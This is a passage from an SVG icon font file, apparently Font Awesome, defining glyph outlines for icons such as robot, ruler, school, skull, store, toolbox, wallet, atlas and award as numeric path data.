d="M358.4 444.8c10.5996 7.90039 25.5996 0.400391 25.5996 -12.7998v-480c0 -13.2002 -15.0996 -20.7002 -25.5996 -12.7998l-38.4004 44.7998l-54.4004 -44.7998c-2.35059 -1.78027 -6.65137 -3.22559 -9.59961 -3.22559s-7.24902 1.44531 -9.59961 3.22559
l-54.4004 44.7998l-54.4004 -44.7998c-2.35059 -1.78027 -6.65137 -3.22559 -9.59961 -3.22559s-7.24902 1.44531 -9.59961 3.22559l-54.4004 44.7998l-38.4004 -44.7998c-10.5996 -7.90039 -25.5996 -0.400391 -25.5996 12.7998v480c0 13.2002 15 20.7002 25.5996 12.7998
l38.4004 -44.7998l54.4004 44.7998c2.35059 1.78027 6.65137 3.22559 9.59961 3.22559s7.24902 -1.44531 9.59961 -3.22559l54.4004 -44.7998l54.4004 44.7998c2.35059 1.78027 6.65137 3.22559 9.59961 3.22559s7.24902 -1.44531 9.59961 -3.22559l54.4004 -44.7998z
M320 88v16c0 4.40039 -3.59961 8 -8 8h-240c-4.40039 0 -8 -3.59961 -8 -8v-16c0 -4.40039 3.59961 -8 8 -8h240c4.40039 0 8 3.59961 8 8zM320 184v16c0 4.40039 -3.59961 8 -8 8h-240c-4.40039 0 -8 -3.59961 -8 -8v-16c0 -4.40039 3.59961 -8 8 -8h240
c4.40039 0 8 3.59961 8 8zM320 280v16c0 4.40039 -3.59961 8 -8 8h-240c-4.40039 0 -8 -3.59961 -8 -8v-16c0 -4.40039 3.59961 -8 8 -8h240c4.40039 0 8 3.59961 8 8z" />
    <glyph glyph-name="robot" unicode="&#xf544;" horiz-adv-x="640" 
d="M0 192c0 17.7002 14.2998 32 32 32h32v-192h-32c-17.7002 0 -32 14.2998 -32 32v128zM464 352c44.2002 0 80 -35.7998 80 -80v-272c0 -35.2998 -28.7002 -64 -64 -64h-320c-35.2998 0 -64 28.7002 -64 64v272c0 44.2002 35.7998 80 80 80h112v64
c0 17.7002 14.2998 32 32 32s32 -14.2998 32 -32v-64h112zM256 32v32h-64v-32h64zM224 152c22.0996 0 40 17.9004 40 40s-17.9004 40 -40 40s-40 -17.9004 -40 -40s17.9004 -40 40 -40zM352 32v32h-64v-32h64zM448 32v32h-64v-32h64zM416 152c22.0996 0 40 17.9004 40 40
s-17.9004 40 -40 40s-40 -17.9004 -40 -40s17.9004 -40 40 -40zM608 224c17.7002 0 32 -14.2998 32 -32v-128c0 -17.7002 -14.2998 -32 -32 -32h-32v192h32z" />
    <glyph glyph-name="ruler" unicode="&#xf545;" horiz-adv-x="640" 
d="M635.7 280.8c8.7998 -15 3.59961 -34.2002 -11.6006 -42.7998l-496.8 -281.9c-15.2002 -8.59961 -34.7002 -3.5 -43.5 11.5l-79.5996 135.601c-8.7998 15 -3.5 34.0996 11.7002 42.7998l69 39.0996l59.6992 -101.399c2.2002 -3.7998 7.10059 -5.10059 10.9004 -2.90039
l13.7998 7.7998c3.7998 2.2002 5.10059 7 2.90039 10.7002l-59.7002 101.7l55.2002 31.2998l27.8994 -47.5c2.2002 -3.7998 7.10059 -5.09961 10.9004 -2.89941l13.7998 7.7998c3.7998 2.2002 5.10059 6.89941 2.90039 10.7002l-27.9004 47.3994l55.2002 31.2998
l59.7002 -101.699c2.2002 -3.80078 7.09961 -5.10059 10.8994 -2.90039l13.8008 7.7998c3.7998 2.2002 5.09961 7 2.89941 10.7002l-59.7998 101.7l55.2002 31.2998l27.8994 -47.2998c2.2002 -3.7998 7.10059 -5.10059 10.9004 -2.90039l13.7998 7.7998
c3.7998 2.2002 5.10059 6.90039 2.90039 10.7002l-27.9004 47.4004l55.2002 31.2998l59.7002 -101.6c2.2002 -3.80078 7.09961 -5.10059 10.8994 -2.90039l13.8008 7.7998c3.7998 2.2002 5.09961 6.90039 2.89941 10.7002l-59.7002 101.7l69 39.0996
c15.2002 8.60059 34.7002 3.5 43.5 -11.5z" />
    <glyph glyph-name="ruler-combined" unicode="&#xf546;" 
d="M160 160v-41.3799l-158.43 -158.42c-0.660156 2.55957 -1.57031 5.03027 -1.57031 7.7998v448c0 17.6699 14.3301 32 32 32h96c17.6699 0 32 -14.3301 32 -32v-32h-56c-4.41992 0 -8 -3.58008 -8 -8v-16c0 -4.41992 3.58008 -8 8 -8h56v-64h-56
c-4.41992 0 -8 -3.58008 -8 -8v-16c0 -4.41992 3.58008 -8 8 -8h56v-64h-56c-4.41992 0 -8 -3.58008 -8 -8v-16c0 -4.41992 3.58008 -8 8 -8h56zM480 96c17.6699 0 32 -14.3301 32 -32v-96c0 -17.6699 -14.3301 -32 -32 -32h-448
c-2.75977 0 -5.24023 0.910156 -7.7998 1.57031l158.43 158.43h41.3701v-56c0 -4.41992 3.58008 -8 8 -8h16c4.41992 0 8 3.58008 8 8v56h64v-56c0 -4.41992 3.58008 -8 8 -8h16c4.41992 0 8 3.58008 8 8v56h64v-56c0 -4.41992 3.58008 -8 8 -8h16c4.41992 0 8 3.58008 8 8
v56h32z" />
    <glyph glyph-name="ruler-horizontal" unicode="&#xf547;" horiz-adv-x="576" 
d="M544 320c17.6699 0 32 -14.3301 32 -32v-192c0 -17.6699 -14.3301 -32 -32 -32h-512c-17.6699 0 -32 14.3301 -32 32v192c0 17.6699 14.3301 32 32 32h48v-88c0 -4.41992 3.58008 -8 8 -8h16c4.41992 0 8 3.58008 8 8v88h64v-88c0 -4.41992 3.58008 -8 8 -8h16
c4.41992 0 8 3.58008 8 8v88h64v-88c0 -4.41992 3.58008 -8 8 -8h16c4.41992 0 8 3.58008 8 8v88h64v-88c0 -4.41992 3.58008 -8 8 -8h16c4.41992 0 8 3.58008 8 8v88h64v-88c0 -4.41992 3.58008 -8 8 -8h16c4.41992 0 8 3.58008 8 8v88h48z" />
    <glyph glyph-name="ruler-vertical" unicode="&#xf548;" horiz-adv-x="256" 
d="M168 32h88v-64c0 -17.6699 -14.3301 -32 -32 -32h-192c-17.6699 0 -32 14.3301 -32 32v448c0 17.6699 14.3301 32 32 32h192c17.6699 0 32 -14.3301 32 -32v-64h-88c-4.41992 0 -8 -3.58008 -8 -8v-16c0 -4.41992 3.58008 -8 8 -8h88v-64h-88
c-4.41992 0 -8 -3.58008 -8 -8v-16c0 -4.41992 3.58008 -8 8 -8h88v-64h-88c-4.41992 0 -8 -3.58008 -8 -8v-16c0 -4.41992 3.58008 -8 8 -8h88v-64h-88c-4.41992 0 -8 -3.58008 -8 -8v-16c0 -4.41992 3.58008 -8 8 -8z" />
    <glyph glyph-name="school" unicode="&#xf549;" horiz-adv-x="640" 
d="M0 224c0 17.6699 14.3301 32 32 32h64v-320h-80c-8.83984 0 -16 7.16016 -16 16v272zM360 272c4.41992 0 8 -3.58008 8 -8v-16c0 -4.41992 -3.58008 -8 -8 -8h-48c-4.41992 0 -8 3.58008 -8 8v64c0 4.41992 3.58008 8 8 8h16c4.41992 0 8 -3.58008 8 -8v-40h24z
M497.75 335.96c8.90039 -5.92969 14.25 -15.9297 14.25 -26.6299v-373.33h-128v144c0 8.83984 -7.16016 16 -16 16h-96c-8.83984 0 -16 -7.16016 -16 -16v-144h-128v373.34c0.00195312 9.45117 6.38574 21.377 14.25 26.6201l160 106.67
c4.4502 2.96484 12.4023 5.37012 17.75 5.37012s13.2998 -2.40527 17.75 -5.37012zM320 192c44.1797 0 80 35.8203 80 80s-35.8203 80 -80 80s-80 -35.8203 -80 -80s35.8203 -80 80 -80zM608 256c17.6699 0 32 -14.3301 32 -32v-272c0 -8.83984 -7.16016 -16 -16 -16h-80
v320h64z" />
    <glyph glyph-name="screwdriver" unicode="&#xf54a;" 
d="M448 448l64 -64l-96 -128h-62.0596l-83.0303 -83.0303c-4.25 6.79004 -9.07031 13.2705 -14.8701 19.0703c-5.7998 5.80957 -12.2803 10.6201 -19.0703 14.8701l83.0303 83.0303v62.0596zM128 169.41c29.1104 29.1094 76.2998 29.1094 105.41 0
c29.1094 -29.1104 29.1094 -76.2998 0 -105.41l-117.08 -117.08c-14.5605 -14.5596 -38.1504 -14.5596 -52.71 0l-52.7002 52.7002c-14.5498 14.5596 -14.5498 38.1602 0 52.71z" />
    <glyph glyph-name="shoe-prints" unicode="&#xf54b;" horiz-adv-x="640" 
d="M192 288c-35.3496 0 -64 28.6504 -64 64s28.6504 64 64 64h32v-128h-32zM0 32c0 35.3496 28.6504 64 64 64h32v-128h-32c-35.3496 0 -64 28.6504 -64 64zM337.46 160c90.3604 0 174.54 -32 174.54 -96c0 -45.2197 -39.0996 -97.2998 -148.58 -120.82
c-31.9795 -6.87012 -64.8896 -8.50977 -97.5801 -6.19922c-27.2998 1.92969 -54.0996 7.76953 -80.3096 15.0498l-57.5303 15.9697v128c60.21 0 79.9404 15.6201 104.73 32c28.5693 18.8799 69.8193 32 104.729 32zM491.42 440.81
c109.48 -23.5098 148.58 -75.5898 148.58 -120.81c0 -64 -84.1797 -96 -174.54 -96c-34.9102 0 -76.1602 13.1201 -104.729 32c-24.79 16.3799 -44.5303 32 -104.73 32v128l57.5303 15.9697c26.21 7.27051 53.0098 13.1104 80.3096 15.04
c32.6904 2.32031 65.6006 0.669922 97.5801 -6.2002z" />
    <glyph glyph-name="skull" unicode="&#xf54c;" 
d="M256 448c141.4 0 256 -100.3 256 -224c0 -70.0996 -36.9004 -132.6 -94.5 -173.7c-9.7002 -6.89941 -15.2002 -18.2002 -13.5 -29.8994l9.40039 -66.2002c1.39941 -9.60059 -6 -18.2002 -15.7002 -18.2002h-77.7002v56c0 4.40039 -3.59961 8 -8 8h-16
c-4.40039 0 -8 -3.59961 -8 -8v-56h-64v56c0 4.40039 -3.59961 8 -8 8h-16c-4.40039 0 -8 -3.59961 -8 -8v-56h-77.7002c-9.7002 0 -17.0996 8.59961 -15.7002 18.2002l9.40039 66.2002c1.7002 11.7998 -3.90039 23 -13.5 29.8994
c-57.5996 41.1006 -94.5 103.601 -94.5 173.7c0 123.7 114.6 224 256 224zM160 128c35.2998 0 64 28.7002 64 64s-28.7002 64 -64 64s-64 -28.7002 -64 -64s28.7002 -64 64 -64zM352 128c35.2998 0 64 28.7002 64 64s-28.7002 64 -64 64s-64 -28.7002 -64 -64
s28.7002 -64 64 -64z" />
    <glyph glyph-name="smoking-ban" unicode="&#xf54d;" 
d="M96 144v64c0 8.7998 7.2002 16 16 16h21.5l96 -96h-117.5c-8.7998 0 -16 7.2002 -16 16zM256 448c141.4 0 256 -114.6 256 -256s-114.6 -256 -256 -256s-256 114.6 -256 256s114.6 256 256 256zM256 0c41.4004 0 79.7002 13.2998 111.1 35.7002l-267.399 267.399
c-22.4004 -31.3994 -35.7002 -69.6992 -35.7002 -111.1c0 -105.9 86.0996 -192 192 -192zM301.2 192l32 -32h50.7998v32h-82.7998zM412.3 80.9004c22.4004 31.3994 35.7002 69.6992 35.7002 111.1c0 105.9 -86.0996 192 -192 192
c-41.4004 0 -79.7002 -13.2998 -111.1 -35.7002l124.3 -124.3h130.8c8.7998 0 16 -7.2002 16 -16v-64c0 -8.7998 -7.2002 -16 -16 -16h-34.7998zM320.6 320c32.1006 0 58.7002 -23.7002 63.3008 -54.5996c0.699219 -4.90039 -3 -9.40039 -8 -9.40039h-16.2002
c-3.7002 0 -7 2.5 -7.7002 6.09961c-2.7998 14.7002 -15.7998 25.9004 -31.4004 25.9004c-32.0996 0 -58.6992 23.7002 -63.2998 54.5996c-0.700195 4.90039 3 9.40039 8 9.40039h16.2002c3.7002 0 7 -2.5 7.7002 -6.09961
c2.7998 -14.7002 15.7998 -25.9004 31.3994 -25.9004z" />
    <glyph glyph-name="store" unicode="&#xf54e;" horiz-adv-x="616" 
d="M602 329.4c33.5996 -53.6006 3.7998 -128 -59 -136.4c-4.5 -0.599609 -9 -0.900391 -13.7002 -0.900391c-29.5 0 -55.7002 13 -73.7998 33.1006c-18 -20.1006 -44.2002 -33.1006 -73.7998 -33.1006c-29.5 0 -55.7998 13 -73.7998 33.1006
c-18 -20.1006 -44.2002 -33.1006 -73.8008 -33.1006c-29.5 0 -55.7998 13 -73.7998 33.1006c-18 -20.1006 -44.2002 -33.1006 -73.7998 -33.1006c-4.59961 0 -9.2002 0.300781 -13.7002 0.900391c-62.5996 8.5 -92.2998 82.9004 -58.7998 136.4l64.9004 103.6
c5.7998 9.2998 16.0996 15 27.0996 15h404c11 0 21.2998 -5.7002 27.0996 -15zM529.5 160c6.09961 0 12.0996 0.400391 18.2002 1.2002c5.59961 0.700195 11 2 16.3994 3.59961v-196.8c0 -17.7002 -14.2998 -32 -32 -32h-448c-17.6992 0 -32 14.2998 -32 32v196.8
c5.30078 -1.5 10.8008 -2.7998 16.4004 -3.59961c5.90039 -0.799805 12 -1.2002 18 -1.2002c10 0 19.9004 1.59961 29.5 3.7998v-99.7998h384v99.7998c9.59961 -2.2998 19.5 -3.7998 29.5 -3.7998z" />
    <glyph glyph-name="store-alt" unicode="&#xf54f;" horiz-adv-x="640" 
d="M320 64v160h64v-256c0 -17.7002 -14.2998 -32 -32 -32h-256c-17.7002 0 -32 14.2998 -32 32v256h64v-160h192zM634.6 305.8c14.1006 -21.2998 -1.09961 -49.7998 -26.5996 -49.7998h-575.9c-25.5996 0 -40.7998 28.5 -26.5996 49.7998l85.2998 128
c5.90039 8.90039 15.9004 14.2002 26.6006 14.2002h405.199c10.7002 0 20.7002 -5.2998 26.7002 -14.2002zM512 -48v272h64v-272c0 -8.7998 -7.2002 -16 -16 -16h-32c-8.7998 0 -16 7.2002 -16 16z" />
    <glyph glyph-name="stream" unicode="&#xf550;" 
d="M16 320c-8.83984 0 -16 7.16016 -16 16v64c0 8.83984 7.16016 16 16 16h416c8.83984 0 16 -7.16016 16 -16v-64c0 -8.83984 -7.16016 -16 -16 -16h-416zM496 240c8.83984 0 16 -7.16016 16 -16v-64c0 -8.83984 -7.16016 -16 -16 -16h-416c-8.83984 0 -16 7.16016 -16 16
v64c0 8.83984 7.16016 16 16 16h416zM432 64c8.83984 0 16 -7.16016 16 -16v-64c0 -8.83984 -7.16016 -16 -16 -16h-416c-8.83984 0 -16 7.16016 -16 16v64c0 8.83984 7.16016 16 16 16h416z" />
    <glyph glyph-name="stroopwafel" unicode="&#xf551;" 
d="M188.12 237.26l45.25 -45.2598l-45.2598 -45.25l-45.25 45.25zM301.25 259.88l-45.25 -45.25l-45.25 45.2598l45.25 45.25zM210.75 124.12l45.25 45.25l45.2598 -45.25l-45.2598 -45.2598zM256 448c141.38 0 256 -114.62 256 -256s-114.62 -256 -256 -256
s-256 114.62 -256 256s114.62 256 256 256zM442.68 152.4c1.29199 1.29492 2.34082 3.83008 2.34082 5.65918c0 1.83008 -1.04883 4.36523 -2.34082 5.66016l-28.29 28.2803l28.2705 28.3096c3.12012 3.12012 3.12012 8.19043 0 11.3105l-11.3105 11.3096
c-3.11914 3.12012 -8.18945 3.12012 -11.3096 0l-28.29 -28.29l-45.25 45.2607l33.9404 33.9395l16.9697 -16.9697c3.12012 -3.12012 8.18945 -3.12012 11.3096 0l11.3105 11.3096c3.12012 3.12012 3.12012 8.19043 0 11.3105l-16.9707 16.9697l16.9707 16.9697
c3.12012 3.12012 3.12012 8.19043 0 11.3105l-11.3105 11.3096c-3.12012 3.12012 -8.18945 3.12012 -11.3096 0l-16.9697 -16.9697l-16.9707 16.9697c-3.12012 3.12012 -8.18945 3.12012 -11.3096 0l-11.3105 -11.3096c-3.11914 -3.12012 -3.11914 -8.19043 0 -11.3105
l16.9707 -16.9697l-33.9404 -33.9404l-45.2598 45.25l28.29 28.29c3.12012 3.12012 3.12012 8.19043 0 11.3105l-11.3105 11.3096c-3.11914 3.12012 -8.18945 3.12012 -11.3096 0l-28.29 -28.29l-28.3096 28.2705c-3.12012 3.12012 -8.19043 3.12012 -11.3105 0
l-11.3096 -11.3105c-3.12012 -3.11914 -3.12012 -8.18945 0 -11.3096l28.29 -28.29l-45.2607 -45.25l-33.9395 33.9404l16.9697 16.9697c3.12012 3.12012 3.12012 8.18945 0 11.3096l-11.3096 11.3105c-3.12012 3.12012 -8.19043 3.12012 -11.3105 0l-16.9697 -16.9707
l-16.9697 16.9707c-3.12012 3.12012 -8.19043 3.12012 -11.3105 0l-11.3096 -11.3105c-3.12012 -3.12012 -3.12012 -8.18945 0 -11.3096l16.9697 -16.9697l-16.9697 -16.9707c-3.12012 -3.12012 -3.12012 -8.18945 0 -11.3096l11.3096 -11.3105
c3.12012 -3.11914 8.19043 -3.11914 11.3105 0l16.9697 16.9707l33.9404 -33.9404l-45.25 -45.2598l-28.29 28.29c-3.12012 3.12012 -8.19043 3.12012 -11.3105 0l-11.3096 -11.3105c-3.12012 -3.11914 -3.12012 -8.18945 0 -11.3096l28.29 -28.29l-28.29 -28.29
c-3.12012 -3.12012 -3.12012 -8.19043 0 -11.3096l11.3398 -11.3301c3.12012 -3.12012 8.18945 -3.12012 11.3096 0l28.29 28.29l45.25 -45.25l-33.9395 -33.9404l-16.9707 16.9697c-3.11914 3.12012 -8.18945 3.12012 -11.3096 0l-11.3096 -11.3096
c-3.12012 -3.12012 -3.12012 -8.19043 0 -11.3105l16.9697 -16.9697l-16.9697 -16.9697c-3.12012 -3.12012 -3.12012 -8.19043 0 -11.3105l11.3096 -11.3096c3.12012 -3.12012 8.19043 -3.12012 11.3096 0l16.9707 16.9697l16.9697 -16.9697
c3.12012 -3.12012 8.19043 -3.12012 11.3096 0l11.3105 11.3096c3.12012 3.12012 3.12012 8.19043 0 11.3105l-16.9697 16.9697l33.9395 33.9404l45.25 -45.2598l-28.29 -28.29c-3.12012 -3.12012 -3.12012 -8.19043 0 -11.3105l11.3105 -11.3096
c3.11914 -3.12012 8.18945 -3.12012 11.3096 0l28.29 28.29l28.3096 -28.2705c3.12012 -3.12012 8.19043 -3.12012 11.3105 0l11.3096 11.3105c3.12012 3.11914 3.12012 8.18945 0 11.3096l-28.29 28.29l45.2607 45.2598l33.9395 -33.9395l-16.9697 -16.9707
c-3.12012 -3.11914 -3.12012 -8.18945 0 -11.3096l11.3096 -11.3096c3.12012 -3.12012 8.19043 -3.12012 11.3105 0l16.9697 16.9697l16.9697 -16.9697c3.12012 -3.12012 8.19043 -3.12012 11.3105 0l11.3096 11.3096c3.12012 3.12012 3.12012 8.19043 0 11.3096
l-16.9697 16.9707l16.9697 16.9697c3.12012 3.12012 3.12012 8.19043 0 11.3096l-11.3096 11.3105c-3.12012 3.12012 -8.19043 3.12012 -11.3105 0l-16.9697 -16.9697l-33.9404 33.9395l45.25 45.25l28.29 -28.29c3.12012 -3.12012 8.19043 -3.12012 11.3105 0zM278.63 192
l45.2598 45.2598l45.25 -45.2598l-45.25 -45.25z" />
    <glyph glyph-name="toolbox" unicode="&#xf552;" 
d="M502.63 233.37c6 -6 9.37012 -14.1396 9.37012 -22.6201v-82.75h-128v16c0 8.83984 -7.16016 16 -16 16h-32c-8.83984 0 -16 -7.16016 -16 -16v-16h-128v16c0 8.83984 -7.16016 16 -16 16h-32c-8.83984 0 -16 -7.16016 -16 -16v-16h-128v82.7402
c0 8.49023 3.37012 16.6299 9.37012 22.6299l45.25 45.2598c6.00977 6 14.1396 9.37012 22.6299 9.37012h50.75v80c0 26.5098 21.4902 48 48 48h160c26.5098 0 48 -21.4902 48 -48v-80.0098h50.75c8.49023 0 16.6299 -3.37012 22.6299 -9.37012zM320 288v64h-128v-64h128z
M384 80v16h128v-96c0 -17.6699 -14.3301 -32 -32 -32h-448c-17.6699 0 -32 14.3301 -32 32v96h128v-16c0 -8.83984 7.16016 -16 16 -16h32c8.83984 0 16 7.16016 16 16v16h128v-16c0 -8.83984 7.16016 -16 16 -16h32c8.83984 0 16 7.16016 16 16z" />
    <glyph glyph-name="tshirt" unicode="&#xf553;" horiz-adv-x="640" 
d="M631.2 351.5c7.89941 -3.90039 11.0996 -13.5996 7.09961 -21.5l-57.2998 -114.4c-4 -8 -13.5996 -11.1992 -21.5 -7.19922l-56.5996 27.6992c-10.6006 5.2002 -23 -2.59961 -23 -14.3994v-253.7c0 -17.7002 -14.3008 -32 -32 -32h-256c-17.7002 0 -32 14.2998 -32 32
v253.6c0 11.9004 -12.4004 19.6006 -23 14.4004l-56.6006 -27.7002c-7.89941 -3.89941 -17.5 -0.700195 -21.5 7.2002l-57.2002 114.5c-3.89941 7.90039 -0.699219 17.5 7.2002 21.5l194.7 96.5c20.0996 -27.7998 64.5996 -47.2002 116.5 -47.2002
s96.4004 19.4004 116.5 47.2002z" />
    <glyph glyph-name="walking" unicode="&#xf554;" horiz-adv-x="320" 
d="M208 352c-26.5 0 -48 21.5 -48 48s21.5 48 48 48s48 -21.5 48 -48s-21.5 -48 -48 -48zM302.5 202.9c15.7002 -7.90039 22 -27.3008 14.2998 -43c-7.89941 -15.8008 -26.8994 -22.2002 -42.5 -14.3008l-23.2998 11.8008c-15 7.59961 -26.4004 20.8994 -31.7002 37
l-5.5 16.5l-17.2002 -68.7002l45.5 -49.7002c7.2002 -7.7998 12.3008 -17.4004 14.9004 -27.7002l22.2002 -89c4.2998 -17.0996 -6.2002 -34.5 -23.2998 -38.7998c-17.1006 -4.2998 -34.5 6.2002 -38.8008 23.2998l-18.2998 73.2998
c-2.59961 10.3008 -7.7002 19.8008 -14.8994 27.7002l-59.9004 65.4004c-14.5 15.8994 -20.0996 38 -14.9004 58.7998l15.2002 60.7002l-26.7998 -10.7998c-7.2002 -2.90039 -13 -8.40039 -16.5 -15.4004l-6.7002 -13.5996
c-7.89941 -15.8008 -26.8994 -22.2002 -42.5 -14.3008c-15.7002 7.90039 -22 27.1006 -14.2002 42.9004l6.7002 13.5996c10.4004 21 28.1006 37.5 49.7002 46.2002c37.4004 15.1006 57.2998 25.2998 93.2998 25.2002c46.5 -0.0996094 87.5 -31.2998 102.2 -75.9004
l9.7002 -29.3994zM73.5996 62.2002l20.7002 51.5c8.7002 -11.9004 -7.89941 6.59961 47.4004 -53.7002l-13.5 -33.7998c-3.2998 -8.10059 -8.10059 -15.4004 -14.2002 -21.5l-59.4004 -59.4004c-12.5 -12.5 -32.6992 -12.5 -45.1992 0s-12.5 32.7998 0 45.2998l50 50.1006
c6.19922 6.09961 11 13.3994 14.1992 21.5z" />
    <glyph glyph-name="wallet" unicode="&#xf555;" 
d="M461.2 320c28.0195 0 50.7998 -21.5303 50.7998 -48v-256c0 -26.4697 -22.7803 -48 -50.7998 -48h-397.2c-35.3496 0 -64 28.6504 -64 64v320c0 35.3496 28.6504 64 64 64h368c26.5098 0 48 -21.4902 48 -48c0 -8.83984 -7.16016 -16 -16 -16h-384
c-8.83984 0 -16 -7.16016 -16 -16s7.16016 -16 16 -16h381.2zM416 112c17.6699 0 32 14.3301 32 32s-14.3301 32 -32 32s-32 -14.3301 -32 -32s14.3301 -32 32 -32z" />
    <glyph glyph-name="angry" unicode="&#xf556;" horiz-adv-x="496" 
d="M248 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM136 208c0 -17.7002 14.4004 -32 32.0996 -32c17.7002 0 32 14.2998 32 32c0 2.90039 -1 5.5 -1.69922 8.2002c0.599609 0 1.19922 -0.200195 1.69922 -0.200195
c6.90039 0 13.2002 4.5 15.3008 11.4004c2.59961 8.39941 -2.2002 17.3994 -10.7002 19.8994l-80 24c-8.5 2.5 -17.4004 -2.2002 -19.9004 -10.7002c-2.59961 -8.39941 2.2002 -17.3994 10.7002 -19.8994l31 -9.2998c-6.40039 -5.90039 -10.5 -14.1006 -10.5 -23.4004z
M304 53.7998c13.4004 -16.0996 38.2998 4 24.5 20.5c-20 24 -49.4004 37.7998 -80.5996 37.7998c-31.2002 0 -60.6006 -13.7998 -80.6006 -37.7998c-13.5996 -16.2998 11.1006 -36.7998 24.6006 -20.5c27.8994 33.4004 84.2998 33.4004 112.1 0zM380.6 240.7
c8.5 2.5 13.3008 11.3994 10.8008 19.8994c-2.5 8.40039 -11.5 13.2002 -19.9004 10.7002l-80 -24c-8.40039 -2.5 -13.2002 -11.3994 -10.7002 -19.8994c2.10059 -6.90039 8.40039 -11.4004 15.2998 -11.4004c0.600586 0 1.10059 0.0996094 1.7002 0.200195
c-0.799805 -2.60059 -1.7002 -5.2998 -1.7002 -8.2002c0 -17.7002 14.3008 -32 32 -32c17.7002 0 32 14.2998 32 32c0 9.2998 -4.19922 17.5996 -10.5 23.4004z" />
    <glyph glyph-name="archway" unicode="&#xf557;" horiz-adv-x="576" 
d="M560 0c8.83984 0 16 -7.16016 16 -16v-32c0 -8.83984 -7.16016 -16 -16 -16h-159.98c-8.83984 0 -16 7.16016 -16 16v16l-0.0195312 160c0 53.0195 -42.9805 96 -96 96s-96 -42.9805 -96 -96v-176c0 -8.83984 -7.16016 -16 -16 -16h-159.98
c-8.83984 0 -16 7.16016 -16 16v32c0 8.83984 7.16016 16 16 16h15.9805v352h512v-352h16zM560 448c8.83984 0 16 -7.16016 16 -16v-32c0 -8.83984 -7.16016 -16 -16 -16h-544c-8.83984 0 -16 7.16016 -16 16v32c0 8.83984 7.16016 16 16 16h544z" />
    <glyph glyph-name="atlas" unicode="&#xf558;" horiz-adv-x="448" 
d="M318.38 240c-5.28027 -31.2197 -25.5898 -57.1699 -53.2998 -70.4102c7.66992 19.0605 12.7197 43.3799 14.21 70.4102h39.0898zM318.38 272h-39.0898c-1.49023 27.0303 -6.53027 51.3496 -14.21 70.4102c27.71 -13.2402 48.0098 -39.1904 53.2998 -70.4102zM224 350.69
c7.69043 -7.4502 20.7695 -34.4307 23.4404 -78.6904h-46.8701c2.66016 44.2695 15.7393 71.2402 23.4297 78.6904zM182.92 342.41c-7.67969 -19.0605 -12.7197 -43.3799 -14.21 -70.4102h-39.0898c5.28027 31.2197 25.5898 57.1699 53.2998 70.4102zM182.92 169.59
c-27.71 13.2402 -48.0195 39.1904 -53.2998 70.4102h39.0898c1.49023 -27.0303 6.53027 -51.3496 14.21 -70.4102zM247.43 240c-2.66016 -44.2598 -15.7393 -71.2402 -23.4395 -78.6904c-7.69043 7.4502 -20.7705 34.4307 -23.4307 78.6904h46.8701zM448 89.5996
c0 -9.59961 -3.2002 -16 -9.59961 -19.1992c-3.2002 -12.8008 -3.2002 -57.6006 0 -73.6006c6.39941 -6.39941 9.59961 -12.7998 9.59961 -19.2002v-16c0 -16 -12.7998 -25.5996 -25.5996 -25.5996h-326.4c-54.4004 0 -96 41.5996 -96 96v320c0 54.4004 41.5996 96 96 96
h326.4c16 0 25.5996 -9.59961 25.5996 -25.5996v-332.801zM224 384c-70.6904 0 -128 -57.3096 -128 -128s57.3096 -128 128 -128s128 57.3096 128 128s-57.3096 128 -128 128zM384 0v64h-288c-16 0 -32 -12.7998 -32 -32s12.7998 -32 32 -32h288z" />
    <glyph glyph-name="award" unicode="&#xf559;" horiz-adv-x="384" 
d="M97.1201 85.3701c13.79 -13.7803 32.1104 -21.3701 51.6104 -21.3701c12.4395 0 24.4697 3.54004 35.3096 9.58008l-52.0498 -127.62c-4.39062 -10.7695 -18.4307 -13.4004 -26.4307 -4.95996l-36.2393 38.2803l-52.6904 -2.01074
c-11.6201 -0.439453 -19.8203 11.2607 -15.4297 22.0303l45.3701 111.24c7.55957 -5.87012 15.9199 -10.7705 25.4297 -13.3203c20.96 -5.60938 16.4297 -3.16016 25.1201 -11.8496zM382.8 -0.700195c4.39062 -10.7598 -3.80957 -22.4697 -15.4297 -22.0303
l-52.6904 2.01074l-36.25 -38.2803c-7.98926 -8.44043 -22.04 -5.80957 -26.4297 4.95996l-52.0498 127.62c10.8398 -6.03027 22.8701 -9.58008 35.3096 -9.58008c19.5 0 37.8301 7.58984 51.6201 21.3701c8.66992 8.66992 4.0498 6.20996 25.1201 11.8496
c9.50977 2.5498 17.8701 7.44043 25.4297 13.3203zM263 108c-13.2305 -13.4697 -33.8398 -15.8799 -49.7305 -5.82031c-5.37305 3.41211 -14.8994 6.18066 -21.2646 6.18066c-6.36426 0 -15.8916 -2.76855 -21.2646 -6.18066
c-15.9004 -10.0596 -36.5098 -7.64941 -49.7402 5.82031c-14.7305 15 -16.4004 14.04 -38.7803 20.1396c-13.8896 3.79004 -24.75 14.8408 -28.4697 28.9805c-7.48047 28.3994 -5.54004 24.9697 -25.9502 45.75c-10.1699 10.3604 -14.1396 25.4502 -10.4199 39.5898
c7.48047 28.4199 7.46973 24.46 0 52.8203c-3.72949 14.1396 0.25 29.2295 10.4199 39.5801c20.4102 20.7793 18.4805 17.3594 25.9502 45.75c3.71973 14.1396 14.5801 25.1895 28.4697 28.9795c27.8906 7.61035 24.5303 5.62988 44.9404 26.4102
c10.1699 10.3604 25 14.4004 38.8896 10.6104c27.9199 -7.61035 24.0303 -7.60059 51.9004 0c13.8896 3.79004 28.7197 -0.260742 38.8896 -10.6104c20.4297 -20.79 17.0703 -18.7998 44.9502 -26.4102c13.8896 -3.79004 24.75 -14.8398 28.4697 -28.9795
c7.48047 -28.3906 5.54004 -24.9707 25.9502 -45.75c10.1699 -10.3506 14.1396 -25.4404 10.4199 -39.5801c-7.47949 -28.4102 -7.46973 -24.4502 0 -52.8301c3.71973 -14.1406 -0.25 -29.2305 -10.4199 -39.5801c-20.4102 -20.7803 -18.4697 -17.3506 -25.9502 -45.75
c-3.71973 -14.1396 -14.5801 -25.1904 -28.4697 -28.9805c-21.7598 -5.92969 -23.5098 -4.58984 -38.79 -20.1396zM97.6602 272.04c0 -53.0303 42.2402 -96.0205 94.3398 -96.0205s94.3398 42.9902 94.3398 96.0205s-42.2402 96.0195 -94.3398 96.0195
s-94.3398 -42.9893 -94.3398 -96.0195z" />
    <glyph glyph-name="backspace" unicode="&#xf55a;" horiz-adv-x="640" 
